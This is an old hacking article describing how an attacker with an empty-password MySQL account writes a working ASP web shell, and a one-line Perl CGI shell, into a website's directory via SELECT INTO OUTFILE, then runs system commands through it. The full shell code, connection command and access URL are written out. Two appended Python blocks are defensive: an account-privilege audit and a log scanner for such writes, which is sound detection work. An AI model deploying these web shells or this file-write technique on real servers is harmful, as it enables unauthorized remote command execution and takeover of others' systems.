
Exploiting an empty MySQL password
  • Published: 2007-12-28 23:52:44
  • Views: not stated
  • Source: unknown
  • Author: anonymous

One day I suddenly got hold of a website's MySQL account and found that its home page lives in c:\www\www. First download a cmd.asp program from the internet, then write a cmd.sql script to run over the connection, which uploads cmd.asp into the site's directory. The contents of cmd.sql are as follows:


use test;

            create table tmp(cmd TEXT);

            insert into tmp values("<%@ Language=VBScript %>");

            insert into tmp values("<%");

            insert into tmp values("Dim oScript");

            insert into tmp values("Dim oScriptNet");

            insert into tmp values("Dim oFileSys, oFile");

            insert into tmp values("Dim szCMD, szTempFile");

            insert into tmp values("On Error Resume Next");

            insert into tmp values("' -- create the COM objects that we will be using -- '");

            insert into tmp values('Set oScript = Server.CreateObject("WSCRIPT.SHELL")');

            insert into tmp values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")');

            insert into tmp values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")');

            insert into tmp values("' -- check for a command that we have posted -- '");

            insert into tmp values('szCMD = Request.Form(".CMD")');

            insert into tmp values('If (szCMD <> "") Then');

            insert into tmp values("' -- Use a poor mans pipe ... a temp file -- '");

            insert into tmp values('szTempFile = "C:\" & oFileSys.GetTempName( )');

            insert into tmp values('Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)');

            insert into tmp values('Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)');

            insert into tmp values("End If");

            insert into tmp values("%>");

            insert into tmp values("<HTML>");

            insert into tmp values("<BODY>");

            insert into tmp values('<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">');

            insert into tmp values('<input type=text name=".CMD" size=45 value="<%= szCMD %>">');

            insert into tmp values('<input type=submit value="Run">');

            insert into tmp values("</FORM>");

            insert into tmp values("<PRE>");

            insert into tmp values('<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>');

            insert into tmp values("<br>");

            insert into tmp values("<%");

            insert into tmp values("If (IsObject(oFile)) Then");

            insert into tmp values("' -- Read the output from our command and remove the temp file -- '");

            insert into tmp values("On Error Resume Next");

            insert into tmp values("Response.Write Server.HTMLEncode(oFile.ReadAll)");

            insert into tmp values("oFile.Close");

            insert into tmp values("Call oFileSys.DeleteFile(szTempFile, True)");

            insert into tmp values("End If");

            insert into tmp values("%>");

            insert into tmp values("</BODY>");

            insert into tmp values("</HTML>");

            select * from tmp into outfile "c:\\www\\www\\234.asp";

            drop table tmp;

When adding the content to the table with insert into, you cannot push everything in with a single insert into; it has to be added one line at a time or an error occurs, so every line needs its own insert into.

Then connect:


c:\mysql\bin\mysql -u user -p password -h ip <cmd.sql

If the prompt changes to:


c:\mysql\bin\

then the ASP file was created successfully! Next, open:


http:\\www.xxx.com/234.asp

and you have a shell as an ordinary user! With the first step done, becoming the superuser should not be hard either!
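The precondition for the whole procedure above is an account that logs in with no password and still holds the global FILE privilege on a server whose secure_file_priv setting does not confine INTO OUTFILE. The following Python audit, an added defender-side example that is not code from the article, checks those three conditions offline against rows constructed to look like the output of SELECT user, host, authentication_string, File_priv FROM mysql.user (on MySQL 5.6 and older the column is named Password) and SHOW VARIABLES LIKE 'secure_file_priv'. The ACCOUNT LOCK remediation assumes MySQL 5.7.6 or later; the account names and placeholder hashes are constructed.

```python
"""Offline audit of the preconditions an INTO OUTFILE web-shell drop needs:
an empty-password account, the FILE privilege, and an unrestricted
secure_file_priv. Added example; rows below are constructed, not from
a real server."""

from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Account:
    user: str
    host: str
    auth: str       # authentication_string / Password hash; "" = no password set
    file_priv: str  # 'Y' if the account holds the global FILE privilege


def audit(accounts: List[Account], secure_file_priv: Optional[str]) -> List[Tuple[str, str]]:
    """Return (account, finding) pairs. secure_file_priv follows the server
    variable's semantics: "" = any path allowed, None = NULL = INTO OUTFILE
    disabled, a directory = writes confined to that directory."""
    findings = []
    for a in accounts:
        name = f"'{a.user}'@'{a.host}'"
        if a.auth == "":
            findings.append((name, "authenticates with an empty password"))
        if a.host in ("%", ""):
            findings.append((name, "accepts connections from any host"))
        if a.file_priv == "Y":
            if secure_file_priv == "":
                findings.append((name, "FILE privilege with unrestricted secure_file_priv"))
            elif secure_file_priv is not None:
                findings.append((name, f"FILE privilege, writes confined to {secure_file_priv}"))
            # secure_file_priv NULL: FILE cannot be used for OUTFILE writes at all
    return findings


def remediation(findings: List[Tuple[str, str]]) -> List[str]:
    """SQL a DBA would review and run. ACCOUNT LOCK is MySQL 5.7.6+ (assumption).
    secure_file_priv itself is read-only at runtime: set it under [mysqld]
    in my.cnf and restart the server."""
    stmts = []
    for name, finding in findings:
        if finding.startswith("authenticates with an empty password"):
            stmts.append(f"ALTER USER {name} ACCOUNT LOCK;")
        elif finding.startswith("FILE privilege"):
            stmts.append(f"REVOKE FILE ON *.* FROM {name};")
    return list(dict.fromkeys(stmts))  # de-duplicate, keep order


# Constructed sample rows; "*PLACEHOLDERHASH" stands in for a real password hash.
SAMPLE_ACCOUNTS = [
    Account("root", "localhost", "", "Y"),
    Account("web", "%", "*PLACEHOLDERHASH", "N"),
    Account("etl", "10.0.0.5", "*PLACEHOLDERHASH", "Y"),
]

if __name__ == "__main__":
    found = audit(SAMPLE_ACCOUNTS, "")  # "" = the insecure, unrestricted setting
    for name, finding in found:
        print(f"{name}: {finding}")
    for stmt in remediation(found):
        print(stmt)
```

Run the same rows with secure_file_priv set to None (NULL) and the FILE findings disappear, which is the point of setting that variable: even an account that still has FILE can no longer write arbitrary files from a query.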

If you upload a CGI file through MySQL instead, it does not need to be nearly this long:

cmd.sql:

            use test;

            create table tmp(cmd TEXT);

            insert into tmp values('system @ARGV');

            select * from tmp into outfile "c:\\www\\www\\234.cgi";

            drop table tmp;

Then through http:\\www.xxx.com/234.cgi?dir c:\ you likewise get a shell as an ordinary user.
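Both variants on this page, the ASP drop and the CGI drop, leave the same trace on the database server: a SELECT ... INTO OUTFILE whose target path sits under the web root or carries an extension the web server executes. The following Python scanner is an added defender-side example, not code from the article; it reads MySQL general-log records (timestamp, thread id, command type, statement) and flags such writes. The log lines and web-root paths are constructed for the example, the 234.asp and 234.cgi names are taken from the page, and the regex assumes one statement per log line, so continuation lines of multi-line statements are not examined.

```python
"""Flag INTO OUTFILE / INTO DUMPFILE writes into web-served locations in
MySQL general-log lines. Added example; sample log lines are constructed."""

import os
import re
from typing import Dict, Iterable, List

WEB_EXTENSIONS = {".asp", ".aspx", ".cgi", ".php", ".jsp"}

# Thread id and statement text of a general-log "Query" record.
QUERY_RE = re.compile(r"(?P<tid>\d+)\s+Query\s+(?P<sql>.*)$")
# File path of INTO OUTFILE '...' / INTO DUMPFILE "..." with either quote style.
OUTFILE_RE = re.compile(r"""INTO\s+(?:OUTFILE|DUMPFILE)\s+(['"])(?P<path>.*?)\1""", re.IGNORECASE)


def normalize(path: str) -> str:
    """Undo the backslash doubling of SQL string literals, use forward
    slashes and lowercase so Windows and Unix paths compare alike."""
    return path.replace("\\\\", "\\").replace("\\", "/").lower().rstrip("/")


def scan_general_log(lines: Iterable[str], web_roots: Iterable[str]) -> List[Dict]:
    """Return one finding per OUTFILE/DUMPFILE write under a web root or
    with a web-executable extension: {"thread", "path", "reasons"}."""
    roots = [normalize(r) for r in web_roots]
    findings = []
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue  # Connect/Quit records, continuation lines
        f = OUTFILE_RE.search(m.group("sql"))
        if not f:
            continue
        path = normalize(f.group("path"))
        reasons = [f"under web root {root}" for root in roots if path.startswith(root + "/")]
        ext = os.path.splitext(path)[1]
        if ext in WEB_EXTENSIONS:
            reasons.append(f"web-executable extension {ext}")
        if reasons:
            findings.append({"thread": int(m.group("tid")), "path": path, "reasons": reasons})
    return findings


# Constructed log lines in general_log layout; thread 12 mirrors the page's
# cmd.sql sequence, thread 31 is a legitimate export plus one DUMPFILE drop.
SAMPLE_LOG = [
    "071228 23:52:44\t   12 Connect\tuser@10.0.0.5 on test",
    "071228 23:52:44\t   12 Query\tuse test",
    "071228 23:52:45\t   12 Query\tcreate table tmp(cmd TEXT)",
    '071228 23:52:46\t   12 Query\tselect * from tmp into outfile "c:\\\\www\\\\www\\\\234.asp"',
    '071228 23:52:47\t   12 Query\tselect * from tmp into outfile "c:\\\\www\\\\www\\\\234.cgi"',
    "2024-01-01T10:00:00.000000Z\t   31 Query\tSELECT id, total FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
    "2024-01-01T10:00:05.000000Z\t   31 Query\tSELECT 1 INTO DUMPFILE '/var/www/html/x.php'",
]
WEB_ROOTS = ["c:\\www\\www", "/var/www"]  # placeholders for the monitored host's document roots

if __name__ == "__main__":
    for hit in scan_general_log(SAMPLE_LOG, WEB_ROOTS):
        print(f"thread {hit['thread']}: {hit['path']} ({'; '.join(hit['reasons'])})")
```

The export to /var/lib/mysql-files is deliberately left unflagged: confining secure_file_priv to such a directory is the normal hardening, and the scanner only needs to alert when a write escapes it into content the web server will serve or execute.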
